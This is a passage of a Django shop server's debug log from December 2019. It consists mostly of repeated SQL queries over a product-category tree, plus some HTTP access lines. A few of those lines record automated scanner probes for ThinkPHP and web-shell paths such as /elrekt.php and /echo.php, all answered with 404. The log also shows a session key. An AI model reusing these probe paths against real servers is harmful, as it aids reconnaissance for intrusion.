"shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 07:51:51,782 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 07:51:51,785 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 07:51:51,788 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 07:51:51,790 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 07:51:51,792 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 07:51:51,794 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 07:51:51,796 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 07:51:51,799 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 07:51:51,802 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 07:51:51,804 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 07:51:51,806 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-27 07:51:51,808 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 07:51:51,811 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 07:51:51,813 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 07:51:51,816 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 07:51:51,818 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 07:51:51,820 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 07:51:51,822 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 07:51:51,824 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 07:51:51,826 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 07:51:51,829 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 07:51:51,831 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 07:51:51,833 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [27/Dec/2019 07:51:51] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [27/Dec/2019 07:56:44] "GET / HTTP/1.0" 302 0 [27/Dec/2019 08:05:00] "GET / HTTP/1.0" 302 0 [27/Dec/2019 08:10:30] "GET / HTTP/1.0" 302 0 [27/Dec/2019 08:15:32] "GET / HTTP/1.0" 302 0 Not Found: /TP/public/index.php [27/Dec/2019 08:16:59] "GET /TP/public/index.php HTTP/1.0" 404 6367 Not Found: /TP/index.php [27/Dec/2019 08:17:00] "GET /TP/index.php HTTP/1.0" 404 6346 Not Found: /thinkphp/html/public/index.php [27/Dec/2019 08:17:00] "GET /thinkphp/html/public/index.php HTTP/1.0" 404 6400 Not Found: /html/public/index.php [27/Dec/2019 08:17:00] "GET /html/public/index.php HTTP/1.0" 404 6373 Not Found: /public/index.php [27/Dec/2019 08:17:01] "GET /public/index.php HTTP/1.0" 404 6358 Not Found: /TP/html/public/index.php [27/Dec/2019 08:17:01] "GET /TP/html/public/index.php HTTP/1.0" 404 6382 Not Found: /elrekt.php [27/Dec/2019 08:17:02] "GET /elrekt.php HTTP/1.0" 404 6340 Not Found: /index.php [27/Dec/2019 08:17:02] "GET /index.php HTTP/1.0" 404 6337 [27/Dec/2019 08:17:03] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-27 08:17:03,587 utils 32506 139738707130112 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'a53ooqfqhbtho16ezy4ooteaymj0tw33' LIMIT 1; args=('a53ooqfqhbtho16ezy4ooteaymj0tw33',) DEBUG 2019-12-27 08:17:03,589 utils 32506 139738707130112 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('a53ooqfqhbtho16ezy4ooteaymj0tw33', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-10T08:17:03.588271+00:00'::timestamptz); args=('a53ooqfqhbtho16ezy4ooteaymj0tw33', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 10, 8, 17, 3, 588271, tzinfo=)) [27/Dec/2019 08:17:03] "GET /login/?next=/ HTTP/1.0" 200 1786 [27/Dec/2019 08:23:39] "GET / HTTP/1.0" 302 0 [27/Dec/2019 08:28:41] "GET / HTTP/1.0" 302 0 [27/Dec/2019 08:33:44] "GET / HTTP/1.0" 302 0 Not Found: /echo.php [27/Dec/2019 08:40:14] "GET /echo.php HTTP/1.0" 404 6335 [27/Dec/2019 08:43:37] "GET / HTTP/1.0" 302 0 [27/Dec/2019 08:48:39] "GET / HTTP/1.0" 302 0 [27/Dec/2019 08:58:22] "GET / HTTP/1.0" 302 0 [27/Dec/2019 09:05:03] "GET / HTTP/1.0" 302 0 [27/Dec/2019 09:10:06] "GET / HTTP/1.0" 302 0 [27/Dec/2019 09:15:09] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-27 09:17:55,134 utils 32506 139738707130112 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 09:17:55,141 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 09:17:55,149 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 09:17:55,153 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 09:17:55,159 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 09:17:55,163 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 09:17:55,167 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 09:17:55,171 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 09:17:55,175 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 09:17:55,181 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 09:17:55,185 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 09:17:55,189 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 09:17:55,193 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 09:17:55,197 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 09:17:55,203 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 09:17:55,207 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 09:17:55,211 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 09:17:55,215 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 09:17:55,219 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 09:17:55,224 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 09:17:55,228 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 09:17:55,232 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 09:17:55,235 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 09:17:55,238 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 09:17:55,242 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 09:17:55,245 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 09:17:55,248 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 09:17:55,252 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 09:17:55,255 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 09:17:55,258 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 09:17:55,263 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 09:17:55,267 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 09:17:55,269 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 09:17:55,272 utils 32506 139738707130112 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-27 09:17:55,275 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 09:17:55,281 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 09:17:55,284 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 09:17:55,287 utils 32506 139738707130112 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", 